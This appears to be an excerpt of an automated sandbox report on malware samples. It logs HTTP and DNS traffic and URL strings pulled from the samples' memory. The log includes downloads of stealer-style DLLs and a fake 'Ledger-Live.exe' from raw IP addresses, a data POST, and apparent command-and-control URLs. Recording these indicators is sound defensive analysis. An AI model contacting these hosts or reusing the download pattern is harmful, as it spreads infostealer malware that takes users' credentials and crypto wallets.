Source: global traffic	HTTP traffic detected: GET /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 294anacamptometer.sbsCache-Control: no-cacheCookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
Source: global traffic	HTTP traffic detected: GET /share/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ngovpn.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /silno/download.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/nss3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1Host: 185.172.128.26Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Ledger-Live.exe HTTP/1.1Host: 185.172.128.65Cache-Control: no-cache

Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.twitter.com (Twitter)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.youtube.com (Youtube)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.cLR equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.cLR equals www.twitter.com (Twitter)
Source: i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.cLR equals www.youtube.com (Youtube)
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.twitter.com (Twitter)
Source: i1crvbOZAP.exe, 00000000.00000003.1744031288.0000029625C06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.youtube.com (Youtube)
Source: i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.twitter.com (Twitter)
Source: i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.youtube.com (Youtube)
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspt equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspt equals www.twitter.com (Twitter)
Source: i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspt equals www.youtube.com (Youtube)
Source: i1crvbOZAP.exe, 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: copyFrom+https://me.yahoo.com/Khttps://www.google.com/accounts/o8/id3https://www.myopenid.com/;https://pip.verisignlabs.com/+https://myvidoop.com/ equals www.yahoo.com (Yahoo)
Source: KUc3lCE6xAEEreIlM0ct4583.exe	String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe	String found in binary or memory: ps://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yande equals www.facebook.com (Facebook)
Source: i1crvbOZAP.exe	String found in binary or memory: ps://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yande equals www.twitter.com (Twitter)

Source: unknown

DNS traffic detected: queries for: api.myip.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 08:14:59 GMTContent-Type: text/html; charset=utf-8Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 28 Mar 2024 08:14:59 GMTSet-Cookie: _subid=2os9o961spv0l; expires=Sun, 28 Apr 2024 08:14:59 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q; expires=Fri, 24 Jun 2078 16:29:58 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 86b62b737f2c0815-IAD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 08:15:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 28 Mar 2024 08:15:00 GMTSet-Cookie: _subid=2os9o961spv0m; expires=Sun, 28 Apr 2024 08:15:00 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q; expires=Fri, 24 Jun 2078 16:30:00 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 86b62b7a4ee13af9-IAD

Source: i1crvbOZAP.exe, 00000000.00000002.1961249702.0000029625A02000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.135/gyhu
Source: i1crvbOZAP.exe, 00000000.00000003.1685738972.00000296259FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.135/gyhuC:
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000002.1963499955.0000029625ACC000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1731085398.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1786242133.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1755498486.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1920255803.0000029625AC4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1744586501.0000029625ACB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625AB6000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1724487309.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1742129670.0000029625AC5000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1748051446.0000029625ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.135/gyhue
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.135/gyhue0acmw
Source: i1crvbOZAP.exe, 00000000.00000003.1688671802.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1685738972.0000029625A72000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701237651.0000029625A72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.135/gyhuom
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.1
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507826601.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/freebl3.dll
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/mozglue.dll
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/msvcp140.dll
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/msvcp140.dlli
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/nss3.dll
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/nss3.dllO
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.26/8e6d9db21fb63946/softokn3.dll
